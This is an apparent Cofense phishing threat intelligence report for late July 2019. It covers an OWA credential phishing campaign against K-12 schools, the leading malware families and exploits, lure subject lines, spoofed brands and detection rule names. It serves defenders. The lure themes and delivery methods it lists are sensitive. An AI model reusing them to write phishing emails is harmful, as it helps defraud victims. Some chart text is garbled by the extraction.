C2 SOURCES FOR REPORT PERIOD

2019-07-18 TO 2019-08-01U.S. Public Schools Web Services Targeted By Credential Phishing

Campaigns Cofense Intelligence has analyzed a credential phishing

campaign that is targeting specific K-12 public schools webmail

services. The latest attack specifically targeted Outlook Webmail

Access (OWA) credentials by posing as a copy of an OWA login page.

Emails sent to exfiltrate credentials included a .HTM file which spoofed

the webmail service with the fake login page. Unsuspecting victims

would believe that the message is legitimate thanks to its subject of

'Message From The Administrator' and theme of an email account

closure notice, thus leading to a higher rate of success.

TABLE OF CONTENTSC2 DISTRIBUTION

IN A HURRY

PHISHING TRENDS

Top 5 Families by Volume

Top 5 Phenotypes

Top 5 Delivery Mechanisms

FILE AND DELIVERY TRENDS

Top 5 Subjects

Top 5 Spoofed Brands

File Extensions

INTELLIGENCE METRICS

New PhishMe Templates

Cofense Triage Rules

IOC Count by Severity

5 10 15 20 25 30 35 40 45 50 55 60 65 70 75 80 85 90 95 100

EXECUTIVE SUMMARYIn a hurry? Understand the phishing threat landscape at a glance! Here you can find the top threats of the reporting period to directly support

your executive leadership. While the information on this page will be found elsewhere in the report, we wanted to provide you with a one-

paged summary that you can provide in your internal executive reports.

TOP MALWARE THREATS FAMILY

Agent Tesla

PHENOTYPE

Keylogger

STAGE ONE

CVE-2017-11882

TOP CAMPAIGN FEATURES SUBJECT

Order PCT1086586 - Instruments - ENQUIRY

ABUSED BRAND

DHL

FILE EXTENSION

.doc

PHISHING SOURCE

United States

INTELLIGENCE METRICS THREAT REPORTS

471

IOCS

2457

YARA RULES

46

PHISHING TRENDSAgent Tesla Takes The Lead For Most Popular Malware For the first

time, the AgentTesla malware family has overtaken LokiBot in

popularity of campaigns analyzed. Congruently, keyloggers have

risen to be the most popular phenotype overtaking information

stealers. CVE-2017-11882 is at the forefront once again in delivery

mechanisms. For more information on CVE-2017-11882, please visit

https://cofense.com/patch-pass-cve-2017-11882-security-conundrum/.

FAMILIES

Agent Tesla

Loki Bot

NanoCore

Credential Phishing

Remcos Remote Access Trojan

FAMILIES Year

Loki Bot

Pony

NanoCore

Hawkeye Keylogger

AZORult

Cam

paig

ns O

ver

Tim

e

PHENOTYPES OVER TIME

Phenotypes organise malware families by behavior and intent

Report Period Previous 12 Months (Avg)

keylogger stealer bot rat other_malware

Cam

paig

ns O

ver

Tim

e

DELIVERY MECHANISMS OVER TIME

Malicious files used to begin an infection sequence

Report Period Previous 12 Months (Avg)

CVE-2017-11882

OfficeMacro WSCDownloader

CVE-2017-8570

OfficeDocument

with MaliciousOLE Package

FILE AND DELIVERY TRENDSOrders And Shipping Related Themes Rank Highest In Themes

Phishing campaigns with subject line centric around order invoices

and shipping notifications have ranked the highest among themes

analyzed. DHL is the top spoofed brand seen, and .zip attachments

have markedly increased during this data range. SUBJECTS

Order PCT1086586 - Instruments - ENQUIRY

TNT Express Invoice: 09004105

NEW ORDER

REQUEST FOR QUOTATION_HGTC

//Interested in your product//

BRANDS SPOOFED

DHLDHL:50%:50%DHL:50%

TNTTNT:24%:24%TNT:24%

HSBCHSBC:13%:13%HSBC:13%

FedExFedEx:7%:7%FedEx:7%

MaerskMaersk:7%:7%Maersk:7%

Occurrences Over Time

FILE EXTENSIONS DELIVERED DURING REPORT PERIOD

Extensions of files delivered either directly via email or embedded URL

Report Period Previous 12 Months (Avg)

xlsx

docx

r02

img

zip

0 25 50 75 100 125 150 175 200 225 250 275 300

COFENSE INTELLIGENCE METRICSWe Need Your Feedback! Cofense intelligence consistently provides our PhishMe team with real phishing messages to use in the creation of

PhishMe templates. We also offer daily Yara rules directly to our Triage users to help them better identify specific campaigns that target their

users. Here, you can find the most recent PhishMe templates and Yara rules that we have highlighted.

NEW COFENSE PHISHME TEMPLATES

SUBJECT DATE

Sharepoint Alert 2019-07-26 18:14:06 UTC

Bonus Document 2019-07-26 18:11:31 UTC

Independence Day eCard 2019-07-26 18:09:25 UTC

New Project Team 2019-07-26 18:08:01 UTC

Clipped Message 2019-07-26 18:06:09 UTC

NEW COFENSE TRIAGE YARA RULES

PM_Intel_NetWire_27021

PM_Intel_Loki_27019

PM_Intel_CredPhish_27009

PM_Intel_CredPhish_26967

PM_Intel_CredPhish_26946

IOCS BY SEVERITY

SEVERITY COUNT

MAJOR 1698

MODERATE 369

MINOR 386

NONE 4

OTHER 0